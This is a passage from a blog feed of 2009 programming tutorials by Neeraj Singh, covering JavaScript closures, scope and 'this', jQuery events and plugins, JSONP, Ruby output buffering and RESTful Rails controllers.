&quot;search&quot;);      }    },    blurAction: function ($elm) {      if ($elm.attr(&quot;value&quot;) === &quot;search&quot;) {        $elm.attr(&quot;value&quot;, &quot;&quot;);      }    },  }; // return})(jQuery);Search.initAction(jQuery(&quot;#query_term_input&quot;));Search.blurAction(jQuery(&quot;#query_term_input&quot;));</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding this in Javascript object literal]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-this-in-javascript-object-literal"/>
      <updated>2009-08-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-this-in-javascript-object-literal</id>
      <content type="html"><![CDATA[<p>Here is code.</p><pre><code class="language-javascript">var foo = {  first: function () {    console.log(&quot;I am first&quot;);  },  second: function () {    console.log(&quot;I am second&quot;);  },};foo.first();foo.second();</code></pre><p>Everything works fine.</p><p>Now there is a need for function <code>second</code> to call function <code>first</code>. Try this andit will fail.</p><pre><code class="language-javascript">var foo = {  first: function () {    console.log(&quot;I am first&quot;);  },  second: function () {    console.log(&quot;I am second&quot;);    first();  },};foo.second();</code></pre><p>One way to fix this problem is to hardcode value <code>foo</code> inside the <code>second</code>function. Following code works.</p><pre><code class="language-javascript">var foo = {  first: function () {    console.log(&quot;I am first&quot;);  },  second: function () {    console.log(&quot;I am second&quot;);    foo.first();  },};foo.second();</code></pre><p>Above code works but hardcoding the value of <code>foo</code> inside the object literal isnot good. A better way would be to replace the hardcoded name with <code>this</code> .</p><pre><code class="language-javascript">var foo = {  first: function () {    console.log(&quot;I am first&quot;);  },  second: function () {    console.log(&quot;I am second&quot;);    this.first();  },};foo.second();</code></pre><p>All is good.</p><h2>Chasing this</h2><p>Javascript allows one to create function inside a function. Now I am changingthe implementation of method <code>second</code>. Now this method would return anotherfunction.</p><pre><code class="language-javascript">var foo = {  first: function () {    console.log(&quot;I am first&quot;);  },  second: function () {    return function () {      this.first();    };  },};foo.second()();</code></pre><p>Also note that in order to invoke the returned function I have double <code>()()</code> atthe end.</p><p>Above code does not work. It did not work because <code>this</code> has changed. Now <code>this</code>in <code>second</code> function refers to the global object rather than referring to the<code>foo</code> object.</p><p>Fix is simple. In the function <code>second</code> store the value of <code>this</code> in a temporaryvariable and the inner function should use that temporary variable. Thissolution will work because of Javascript's inherent support for closure.</p><pre><code class="language-javascript">var foo = {  first: function () {    console.log(&quot;I am first&quot;);  },  second: function () {    var self = this;    return function () {      self.first();    };  },};foo.second()();</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery custom events]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-custom-events"/>
      <updated>2009-07-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-custom-events</id>
      <content type="html"><![CDATA[<p><em>Following code has been tested with jQuery 1.3 .</em></p><p>Javascript is all about interactions. When an event happens then somethingshould happen. For example hover, click, focus, mouseover etc are basic eventswhich are used on a regular basis. jQuery provides a method called<a href="http://docs.jquery.com/Events/bind#typedatafn">bind</a> to bind an action to anevent. For example, if we want an alert message when we click on a link thenthat can be done like this.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function () {  alert(&quot;I have been clicked&quot;);});</code></pre><p>jQuery also allows developers to make use of custom events. How it is going tohelp us, we are going to see it shortly. First let's take a look at a basiccalendar application.</p><p>This is a simple javascript calendar which primarily does four things: rendercalendar itself, pull data from API and update calendar with API data, abilityto collapse event information and ability to expand event information.</p><p>Code looks like this.</p><pre><code class="language-javascript">function redrawForMonth(d) {  //business logic to render calendar  $(&quot;#monthly_calendar_umbrella&quot;).updateCalendarWithAPIData();  $(&quot;#monthly_calendar_umbrella&quot;).ExpandAllEvents();}function updateCalendarWithAPIData() {  //business logic to get the data from API and appending data to appropriate date cell}function CollapseAllEvents() {  //business logic}function ExpandAllEvents() {  //business logic}</code></pre><p>In the above case we have four methods. If all the implementation is filled outand helper methods are added then ,in total, we'll have tons of methods.</p><p>And slowly, it'll become difficult to see which methods act on the main element<code>monthly_calendar_umbrella</code>.</p><p>Let's look at the same functionality if implemented using jQuery custom events.</p><pre><code class="language-javascript">$(&quot;#monthly_calendar_umbrella&quot;)  .bind(&quot;redrawForMonth&quot;, function (e, d) {})  .bind(&quot;updateCalendarWithAPIData&quot;, function (e, d) {})  .bind(&quot;CollapseAllEvents&quot;, function (e) {})  .bind(&quot;ExpandAllEvents&quot;, function (e) {});</code></pre><p>First difference, you will notice is how nicely all the actions possible on themain element are laid out. In this case just one look at the code tells me thatfour actions can be performed on the main element. This was not so obvious fromthe first version of the code.</p><p>In this case, I am binding events such as 'redrawFroMonth' to the element.Obviously 'redrawForMonth' is not a native event such as 'click' or 'submit'.This is what I mean by binding 'custom events' to elements. In this case'redrawForMonth' is a custom event.</p><p>The other thing that is not so obvious is the shift in focus. Traditionaljavascript programming has been too obsessed with the elements that is clickedor submitted that causes an action. The emphasis has been too much on keepingthe code around the element that creates an action. In this case the code hasbeen developed around the element that is being acted upon.</p><p>Now, the last part of the discussion is how to trigger custom events. Well,jQuery has a method called<a href="http://docs.jquery.com/Events/trigger#eventdata">trigger</a> .</p><p>Note that while binding a function is passed. The first parameter of thatfunction is always an event handler. In the below example I am passing only oneparameter even though the function takes two parameters: event handler elementand the parameter I defined.</p><pre><code class="language-javascript">$(&quot;#monthly_calendar_umbrella&quot;).trigger(&quot;redrawForMonth&quot;, new Date());</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery base code to create a jQuery plugin]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-base-code-to-create-a-jquery-plugin"/>
      <updated>2009-07-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-base-code-to-create-a-jquery-plugin</id>
      <content type="html"><![CDATA[<p><em>Following code has been tested with jQuery 1.3 .</em></p><p>Recently I was discussing how to create a jQuery plugin with a friend of mine.In the end I had a base code that should work as a starting point of any jQueryplugin.</p><p><a href="http://gist.github.com/154375">Take a look</a> here .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Inspecting jQuery internals and storing information]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-data-for-inspecting-jquery-internals-and-for-storing-information"/>
      <updated>2009-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-data-for-inspecting-jquery-internals-and-for-storing-information</id>
      <content type="html"><![CDATA[<p>Following code has been tested with jQuery 1.3 .</p><p>Let's say that I have bound all the links to display an alert.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {  e.preventDefault();  alert(&quot;clicked&quot;);});</code></pre><p>Mine is a large application and a co-worker has added another javascript filewhich does this</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {  e.preventDefault();  alert(&quot;hello&quot;);});</code></pre><p>Now if I click on a link I get two alerts. Not good. One way to debug would beto go through all the included javascript files.</p><p>However it would be cool if there is a way to find all the click handlersassociated with an element.</p><p>jQuery has <a href="http://docs.jquery.com/Internals/jQuery.data">data method</a> which ituses internally to store information. jQuery uses data method to store all thehandlers associated with an element. We could use this information to ouradvantage. Here I am trying to find out all the click handlers associated withthe first link.</p><pre><code class="language-javascript">var output = jQuery.data($(&quot;a&quot;).get(0), &quot;events&quot;);jQuery.each(output.click, function (key, value) {  alert(value);});</code></pre><p>The output looks like this</p><pre><code class="language-javascript">function (e) { e.preventDefault(); alert(&quot;clicked&quot;); }function (e) { e.preventDefault(); alert(&quot;hello&quot;); }</code></pre><p>jQuery.data method is also very useful if you want to store some informationabout an element. For example, in an application you need to store informationabout people. In the html page you are only displaying names. And when a name isclicked then you want to display age, hometown and the company they work for.You can store information about each user using jQuery.data and you can retrieveit when username is clicked.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Event propagation and peventDefault]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/event-propagation-and-peventdefault"/>
      <updated>2009-07-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/event-propagation-and-peventdefault</id>
      <content type="html"><![CDATA[<p>Let's look at sample html.</p><pre><code class="language-html">&lt;div id=&quot;parent&quot;&gt;  Languages  &lt;p&gt;Java&lt;/p&gt;  &lt;p&gt;Javascript&lt;/p&gt;&lt;/div&gt;</code></pre><p>And here is the javascript code. Run the code with jQuery-1.3.2 .</p><pre><code class="language-javascript">$(document).ready(function () {  $(&quot;#parent&quot;).click(function () {    alert(&quot;parent was clicked&quot;);  });  $(&quot;#parent p&quot;).click(function () {    alert(&quot;p was clicked&quot;);  });});</code></pre><p>When you click on <code>Java</code> then you will get two alerts. That is because the clickon element p will propagate outward and it will be caught by element div whichhas onclick trigger.</p><p>If you do not want the event to propagate then here is a way to stop it.</p><pre><code class="language-javascript">$(document).ready(function () {  $(&quot;#parent&quot;).click(function () {    alert(&quot;parent was clicked&quot;);  });  $(&quot;#parent p&quot;).click(function (e) {    alert(&quot;p was clicked&quot;);    e.stopPropagation();  });});</code></pre><h2>Stopping the default behavior</h2><p>Converting a regular html link into an AJAX request is easy. One of the thingsyou need to do is to <code>return false</code> so that the click operation does not performits default behavior.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function () {  alert(&quot;clicked&quot;);  return false;});</code></pre><p>However there is another way to handle such cases. <code>preventDefault</code> stops thedefault behavior. The same code could be written as</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {  e.preventDefault();  alert(&quot;clicked&quot;);});</code></pre><p><em>Not sure why but I have noticed that e.preventDefault() should be the firstline in the function. If I switch the order of e.preventDefault and alertmessage in the above javascript then it does not work in Firefox/mac</em>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[What is JSONP?]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/what-is-jsonp"/>
      <updated>2009-07-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/what-is-jsonp</id>
      <content type="html"><![CDATA[<p><em>This is part II of How to create dynamic javascript widget( Link is notavailable).</em></p><h2>What problem JSONP solves?</h2><p>Browsers do not allow cross-domain Ajax requests. For example if you try to makeAjax request to http://www.eventsinindia.com/events/14633.js to get event datayou will get following error.</p><pre><code class="language-plaintext">Access to restricted URL denied.</code></pre><p>In order to get around this security problem you can do any number of thingsincluding sending the Ajax request to your server which will get the JSON datafrom the eventsinindia.com API. Or use iframe. Both of these solutions areimplemented and discussed in<a href="http://www.neeraj.name/blog/articles/846">this article</a> .</p><p>However in some cases JSONP solves this problem much more elegantly.</p><h2>Before we discuss JSONP some basics ?</h2><p>Before looking at JSONP let's cover some basics. When a html page includes ajavascript file then the html code looks something like this.</p><pre><code class="language-plaintext">&lt;script src=&quot;http://neeraj.name/javascripts/color.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;</code></pre><p>There are two things to notice here. First is that the source of the javascriptfile could be cross-domain. It means your html page can point the source of yourjavascript file to <code>http://neeraj.name/javascripts/cache/all.js</code> and all.js willbe loaded by the browser. This feature which allows cross-domain loading ofjavascript file is the basis of JSONP.</p><p>The second thing to notice is that the javascript written in color.js isimmediately evaluated after the source file has been loaded. For example thecontent of color.js could be this.</p><pre><code class="language-javascript">alert(&quot;hello&quot;);</code></pre><p>When the html page is loaded you will get an alert.</p><p>Let's recap: In the above section I showed you how you can point the source ofyour javascript file to a domain that is not yours (cross-domain) and the codeloaded from the domain is immediately evaluated.</p><h2>What is JSONP?</h2><p>From the above section it is clear that if by some means we could dynamicallycreate a <code>script node</code> and point the source of that node to cross-domain and ifthe remote site returns a javascript function then that function will beevaluated.</p><p>However in the world of JSON we only get JSON data from the remote server. If wewant to stick the returned JSON data on our page then that data needs be used bya javascript function. And that's where JSONP comes in handy.</p><p>Let's take an example. If you make a call tohttp://www.eventsinindia.com/events/14633.js you will get JSON data back.</p><pre><code class="language-ruby">{&quot;name&quot;: &quot;Craft Classes&quot; , &quot;start_date&quot;: &quot;2009-05-01&quot; , ....}</code></pre><p>However what you really want is to do is to stick this data on your html page byinvoking a javascript function like this</p><pre><code class="language-ruby">AddThisDataToPage({&quot;name&quot;: &quot;Craft Classes&quot; , &quot;start_date&quot;: &quot;2009-05-01&quot; , ....});</code></pre><p>What needs to be done is while making a call tohttp://www.eventsinindia.com/events/14633.js pass a parameter called <code>callback</code>. So in this case the full url would look something like this</p><pre><code class="language-ruby">http://www.eventsinindia.com/events/14633.js?callback=AddThisDataToPage</code></pre><p>Remember callback is a special word here. By using callback we are telling APIto wrap the response JSON data with a call to function named AddThisDataToPage.</p><p>Click on following two links to see the difference. The first link is returningpure JSON data while the second link will return a javascript function.</p><p>http://www.eventsinindia.com/events/14633.js</p><p>http://www.eventsinindia.com/events/14633.js?callback=AddThisDataToPage</p><h2>Using JSONP with jQuery</h2><p>jQuery makes it easy to use JSONP. Look for documentation on how to use JSONPwith jquery <a href="http://docs.jquery.com/Ajax/jQuery.getJSON#overview">here</a> .</p><h2>Callback is not the name everyone uses</h2><p>Most of the people use <code>callback</code> as the key word to identify client is askingfor JSONP data. However some people use a different keyword. For example flickruses the keyword <code>jsoncallback</code></p><p>This returns JSON data</p><p><a href="http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json">http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json</a></p><p>In this case callback is being passed but flickr ignores it.</p><p><a href="http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;callback=show">http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;callback=show</a></p><p>In this case callback is being passed but the name is jsoncallback.</p><p><a href="http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;jsoncallback=show">http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;jsoncallback=show</a></p><h2>Providing support for JSONP</h2><p>All the APIs should provide support for JSONP. Enabling JSONP support is easy ifyou are using Rails 2.3 or any Rack compliant framework. In Rails 2.3 all youneed to do is stick this file in lib as jsonp.rb (Link is not available) andthen add one line to the environment.rb .</p><pre><code class="language-ruby">#environment.rbRails::Initializer.run do |config|  .....  config.middleware.use 'Jsonp'end</code></pre><p>That's it. Now you are providing support of JSONP with the keyword being<code>callback</code>.</p><h2>Security</h2><p>Since the data from external source is read and then that data is evaluated onrun time by Javascript, there is potential for security breach. So be carefulwhen you are using JSONP. Only load data from a trusted source.</p>]]></content>
    </entry><entry>
       <title><![CDATA[$stdout.sync = true to flush output immediately]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/stdout-sync-true-to-flush-output-immediately"/>
      <updated>2009-07-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/stdout-sync-true-to-flush-output-immediately</id>
      <content type="html"><![CDATA[<p>Try this.</p><pre><code class="language-ruby">5.times do  putc('.')  sleep(2)end</code></pre><p>I was hoping that I will get a dot after every two seconds. But that's not whathappens when you run the code. I see nothing for first 10 seconds then I seefive dots in one shot. This is not what I wanted.</p><p>I started looking around at the documentation for IO class and found the methodcalled <a href="http://www.ruby-doc.org/core/classes/IO.html#M002263">sync=</a> which ifset to true will flush all output immediately to the underlying OS.</p><p>The reason why OS does not flush immediately is to minimize the IO operationwhich is usually slow. However in this case you are asking OS to not to bufferand to flush the output immediately.</p><pre><code class="language-ruby">$stdout.sync = true5.times do  putc('.')  sleep(2)end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Functional scope in Javascript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/functional-scope-in-javascript-and-how-javascript-continues-to-surprise-me"/>
      <updated>2009-06-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/functional-scope-in-javascript-and-how-javascript-continues-to-surprise-me</id>
      <content type="html"><![CDATA[<p>Javascript continues to surprise me. Check out this code.</p><pre><code class="language-javascript">function foo() {  var x = 100;  alert(x);  for (var x = 1; x &lt;= 10; x++) {}  alert(x);}foo();</code></pre><p>What do you think the value of second alert will be. I thought it would be 100but the answer is 11. That's because the scope of a local variable in Javascriptis not limited to the loop. Rather the scope of a local variable is felt allover the function.</p><p>Before you look at the next piece of code remember that defining a variablewithout the <code>var</code> prefix makes that variable a global variable.</p><pre><code class="language-javascript">fav_star = &quot;Angelina&quot;; /* it is a global variable */function foo() {  var message = &quot;fav star is &quot; + fav_star;  alert(message);  var fav_star = &quot;Jennifer&quot;;  var message2 = &quot;fav star is &quot; + fav_star;  alert(message2);}foo();</code></pre><p>What do you think would be the alert value first time? I thought it would be<code>Angelina</code> but the correct answer is <code>undefined</code>. That is because it does notmatter where the variable is defined. As long as the variable is definedanywhere within a function then that variable will be set to <code>undefined</code>. It iswhen the statement is executed then the value of the variable changes from<code>undefined</code> to <code>Jennifer</code>.</p><p>Thanks to my friend Subba Rao for bringing this feature of Javascript to myattention and for discussing it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[JS tip - Avoiding polluting the global namespace]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/javascript-tip-do-not-pollute-global-namespace-with-utility-functions"/>
      <updated>2009-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/javascript-tip-do-not-pollute-global-namespace-with-utility-functions</id>
      <content type="html"><![CDATA[<p>I am learning Javascript and as I do more Javascript work I am learning not onlythe language but also the best practices. Today I am developing a Javascriptcalendar. In the process of creating the calendar I created a bunch of utilityfunctions that are available at global namespace.</p><h2>What are we talking about</h2><p>My main concern is that as Javascript developer I should not be polluting globalnamespace. I could write the calendar code like this.</p><pre><code class="language-javascript">showCalendar = function (options, d) {};calendarHeaderMonth = function (opts) {};calendarHeaderWeek = function (opts) {};calendarData = function (opts) {};drawCalendar = function (opts, d) {};getCellID = function (year, month, day) {};// use showCalendarshowCalendar({}, new Date());</code></pre><p>You can see that the main method that I want to expose to global namespace is<code>showCalendar</code>. However I am also exposing six other functions to globalnamespace. It means that if some user has declared a global namespace functionnamed <code>getCellID</code> then my <code>getCellID</code> is going to collide with the user'sfunction. This is not good.</p><h2>Goal</h2><p>The goal is to refactor the code in such a way that only one method<code>showCalendar</code> is exposed to the global namespace. In order to test the code atthe very end of the javascript I will invoke a call to method <code>getCellID</code>.</p><pre><code class="language-javascript">showCalendar = function (options, d) {};calendarHeaderMonth = function (opts) {};calendarHeaderWeek = function (opts) {};calendarData = function (opts) {};drawCalendar = function (opts, d) {};getCellID = function (year, month, day) {};// use showCalendarshowCalendar({}, new Date());// this call should fail but is not failing nowgetCellID(2009, 5, 4);</code></pre><p>The above call to <code>getCellID</code> is currently being executed successfully. It meansI have polluted the global namespace. I am going to fix it.</p><h2>Solution</h2><p>The solution is to put all the code inside a function. In a function all thevariables and functions declared are scoped only to that function. Out of thatfunction, inner functions cannot be used. Inside this function only one method<code>showCalendar</code> would be exposed.</p><p>Here is the solution.</p><pre><code class="language-javascript">(function () {  // by not declaring var this variable is going to be at global namespace  showCalendar = function (options, d) {};  var calendarHeaderMonth = function (opts) {};  var calendarHeaderWeek = function (opts) {};  var calendarData = function (opts) {};  var drawCalendar = function (opts, d) {};  var getCellID = function (year, month, day) {};})();showCalendar({}, new Date());// this call will failgetCellID(2009, 5, 4);</code></pre><p>In the above case the call to <code>showCalendar</code> was successful. However call to<code>getCallID</code> failed. That's good. It means I am not polluting the globalnamespace.</p><p>If you notice carefully in the above case after declaring an anonymous functionI am invoking that function by having <code>()</code> at the end. You can read more about<a href="understanding-jquery-plugin-pattern-and-self-invoking-javascript-function">self-invoking function here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Usage of Closure in Javascript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/usage-of-closure-in-javascript"/>
      <updated>2009-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/usage-of-closure-in-javascript</id>
      <content type="html"><![CDATA[<p>In this article you are going to see what you can do with the power of Closurein Javascript. This not an article about what Closure is. This is an articleabout what Closure can do. I see a lot of people asking the question what's thebig deal with Closure. They want more real world cases where Closure will makesense.</p><h2>Example 1: Getting digit name</h2><p>The goal is to read from an array and display the result. The firstimplementation is to put everything in Global namespace.</p><pre><code class="language-javascript">var names = [&quot;zero&quot;, &quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;, &quot;five&quot;];var digit_name = function (n) {  return names[n];};alert(digit_name(3)); // 'three'</code></pre><p>Above solution works. However creating a global variable <code>names</code> is not a goodthing. You should create as less global variables as possible.</p><h2>Moving to a function</h2><p>Next step is to move the code to a function. In this case we will not have anyglobal variable.</p><pre><code class="language-javascript">var digit_name = function (n) {  var names = [&quot;zero&quot;, &quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;, &quot;five&quot;];  return names[n];};alert(digit_name(3));</code></pre><p>The above solution is very slow. Every single time the function is called thewhole array is loaded. This solution works and most of the developers willsettle with this one. However Closure can provide a better solution.</p><h2>Better solution with Closure</h2><pre><code class="language-javascript">var digit_name = (function () {  var names = [&quot;zero&quot;, &quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;, &quot;five&quot;];  return function (n) {    return names[n];  };})();alert(digit_name(3));</code></pre><p>Note that after declaring, the function is also getting invoked. This is a caseof self invoking function. You can find out more about self invoking function<a href="understanding-jquery-plugin-pattern-and-self-invoking-javascript-function">here</a>.</p><h2>Example 2: Getters and Setters</h2><p>Developers deal with getters and setters all the time. However creating a goodgetter and setter could be a little tricky. Here is one implementation</p><pre><code class="language-javascript">function Field(val) {  var value = val;  this.getValue = function () {    return value;  };  this.setValue = function (val) {    value = val;  };}var field = new Field(&quot;test&quot;);field.value;// =&gt; undefinedfield.setValue(&quot;test2&quot;);field.getValue();// =&gt; &quot;test2&quot;</code></pre><p>Above solution works and it's nicely done.</p><p>Let's look at another implementation.</p><pre><code class="language-javascript">var getValue, setValue;(function () {  var secret = 0;  getValue = function () {    return secret;  };  setValue = function (v) {    secret = v;  };})();setValue(&quot;foo&quot;);getValue(); // foo</code></pre><h2>Example 3: Building an iterator using Javascript</h2><pre><code class="language-javascript">function custome_iterator(x) {  var i = 0;  return function () {    return x[i++];  };}var next = setup([&quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;]);next();next();next();</code></pre><p>This is a simple case of serially iterating through the items provided but thelogic of deciding next element can be complex and it can be private.</p><p>Closure is a big topic and a lot of people have written a lot about it. Justsearch for Closure and you will get tons of links. I refer to this article timeto time to see what pattern to use to make best usage of Javascript Closure.</p><p>This article was inspired by<a href="http://www.amazon.com/Object-Oriented-JavaScript-high-quality-applications-libraries/dp/1847194141">this book</a>,<a href="http://www.youtube.com/watch?v=hQVTIJBZook">this video</a> and<a href="http://ejohn.org/blog/javascript-getters-and-setters">this article</a> .</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery Plugin Pattern & self-invoking javascript function]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-jquery-plugin-pattern-and-self-invoking-javascript-function"/>
      <updated>2009-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-jquery-plugin-pattern-and-self-invoking-javascript-function</id>
      <content type="html"><![CDATA[<p>I am learning jQuery and one of things I was struggling with is the pluginpattern. In jQuery world it is very common to wrap the major functionality ofthe application inside a plugin.</p><p><a href="https://www.learningjquery.com/2007/10/a-plugin-development-pattern">Here is a great article</a>which describes in detail how to wrap your javascript code inside a jQueryplugin. The article did a great job of explaining the basics however it took mea while to understand the self-invoking functions.</p><h2>Self-invoking functions</h2><p>self-invoking functions are anonymous functions declared on run time and theninvoke it right then and there. Since they are anonymous functions they can't beinvoked twice. However they are a good candidate for initialization work whichis exactly what is happening in the jQuery plugin pattern.</p><h2>Declaring a function</h2><p>A function can be declared in two ways:</p><pre><code class="language-javascript">function hello() {  alert(&quot;Hello&quot;);}var hello = function () {  alert(&quot;Hello&quot;);};</code></pre><p>The end result in the above two javascript statement was same. In the end avariable named hello was created which is a function.</p><p>Please note that in the above case only the functions are declared. They are notinvoked. In order to invoke the function we have to do this</p><pre><code class="language-javascript">var hello = function () {  alert(&quot;Hello&quot;);};hello();</code></pre><p>How do we invoke an anonymous function. We need to call () on the anonymousfunction. But before that we need to wrap the whole command in (). Take a lookat this</p><pre><code class="language-javascript">// originalfunction hello() {  alert(&quot;Hello&quot;);}// step1 wrap everything in () so that we have a context to invoke(function hello() {  alert(&quot;Hello&quot;);})(  // now call () to invoke this function  function hello() {    alert(&quot;Hello&quot;);  })();</code></pre><p>The final result is weird looking code but it works and that is how an anonymousfunction is declared and invoke on run time.</p><p>With this understanding now it becomes easier to see what is happening in thiscode</p><pre><code class="language-javascript">(function ($) {  // ....})(jQuery);</code></pre><p>In the above case an anonymous function is being created. However unlike myanonymous function this anonymous function take a parameter and the name of thisparameter is $. $ is nothing else but jQuery object that is being passed whileinvoking this function.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Determining if commits are executed in a transaction]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-find-if-my-commits-are-executed-in-a-transaction-or-not"/>
      <updated>2009-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-find-if-my-commits-are-executed-in-a-transaction-or-not</id>
      <content type="html"><![CDATA[<pre><code class="language-ruby">ActiveRecord::Base.connection.supports_ddl_transactions?</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Restful architecture does not mean one to one mapping]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/restful-architecture-does-not-mean-one-to-one-mapping-with-model"/>
      <updated>2009-02-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/restful-architecture-does-not-mean-one-to-one-mapping-with-model</id>
      <content type="html"><![CDATA[<p>Rails makes it easy to adapt Restful architecture. All you have to do isfollowing.</p><pre><code class="language-ruby">map.resources :pictures</code></pre><p>I started putting all pictures related activities in <code>pictures_controller.rb</code> .In the beginning it was simple.</p><p>Slowly the application evolved. The application started handling two differenttypes of pictures. There would be pictures for events and then there would bepictures of users using the system.</p><p>One can add comments to the event pictures but one can't add comment to userpictures. Slowly the requirement for event pictures grew vastly different fromuser pictures.</p><p>Sounds familiar. Right. Initially controller takes on a few responsibilities butslowly the controller starts taking a lot more responsibilities and thencontroller becomes huge.</p><p>The pictures controller was really huge and was fast becoming a mess andspecially writing test was getting very difficult.</p><p>Time had come to create two different controllers: one for event pictures andone for user pictures.</p><p>But wait. Lots of people would say that if we want to be restful then there hasto be one to one mapping between the model and the controller. Not true.</p><h2>Model != resource</h2><p>Being restful does not mean that there has be a one to one mapping between themodel and the controller.</p><p>I am going to create a new controller called <code>user_pictures_controller.rb</code> whichwill take on all the functionality related to users dealing with picture. Andthis is going to be restful.</p><pre><code class="language-ruby">map.resources :user_pictures</code></pre><p>Above I have defined a resource called <code>user_pictures</code>. To keep it simple thiscontroller would do only three things.</p><ul><li>display all the pictures of the user ( index )</li><li>allow user to upload pictures ( create )</li><li>allow user to delete a picture ( destroy )</li></ul><p>That's the general idea. In my application I have only three actions.</p><p>However in the interest of general discussion I am going to show all the sevenmethods here. Also for simplicity create in this case means adding a record (Iam not showing multipart upload).</p><h2>Controller</h2><p>Here is the code for controller.</p><pre><code class="language-ruby"># user_pictures_controller.rbclass UserPicturesController &lt; ApplicationController  def index    @pictures = Picture.all  end  def new    render  end  def create    @picture = Picture.new(params[:picture])    if @picture.save      flash[:notice] = 'Picture was successfully created.'      redirect_to user_picture_path(:id =&gt; @picture.id)    else      render :action =&gt; &quot;new&quot;    end  end  def show    @picture = Picture.find(params[:id])  end  def edit    @picture = Picture.find(params[:id])  end  def update    @picture = Picture.find(params[:id])    if @picture.update_attributes(params[:picture])      flash[:notice] = 'Picture was successfully updated.'      redirect_to user_picture_path(:id =&gt; @picture.id)    else      render :action =&gt; &quot;edit&quot;    end  end  def destroy    @picture = Picture.find(params[:id])    @picture.destroy    redirect_to user_pictures_path  endend</code></pre><h2>View</h2><pre><code class="language-ruby"># index.html.erb&lt;h1&gt;Listing pictures&lt;/h1&gt;&lt;table&gt;  &lt;tr&gt;    &lt;th&gt;Name&lt;/th&gt;    &lt;th&gt;Quality&lt;/th&gt;  &lt;/tr&gt;&lt;% for picture in @pictures %&gt;  &lt;tr&gt;    &lt;td&gt;&lt;%=h picture.name %&gt;&lt;/td&gt;    &lt;td&gt;&lt;%=h picture.quality %&gt;&lt;/td&gt;    &lt;td&gt;&lt;%= link_to 'Show', user_picture_path(picture) %&gt;&lt;/td&gt;    &lt;td&gt;&lt;%= link_to 'Edit', edit_user_picture_path(picture) %&gt;&lt;/td&gt;    &lt;td&gt;  &lt;%= link_to 'Destroy',  user_picture_path(picture),                                :confirm =&gt; 'Are you sure?',                                :method =&gt; :delete %&gt;    &lt;/td&gt;  &lt;/tr&gt;&lt;% end %&gt;&lt;/table&gt;&lt;%= link_to 'New picture', new_user_picture_path %&gt;</code></pre><pre><code class="language-ruby"># edit.html.erb&lt;h1&gt;Editing picture&lt;/h1&gt;&lt;% form_for(:picture,            :url =&gt; user_picture_path(@picture),            :html =&gt; {:method =&gt; :put}) do |f| %&gt;  &lt;%= f.error_messages %&gt;  &lt;p&gt;    &lt;%= f.label :name %&gt;&lt;br /&gt;    &lt;%= f.text_field :name %&gt;  &lt;/p&gt;  &lt;p&gt;    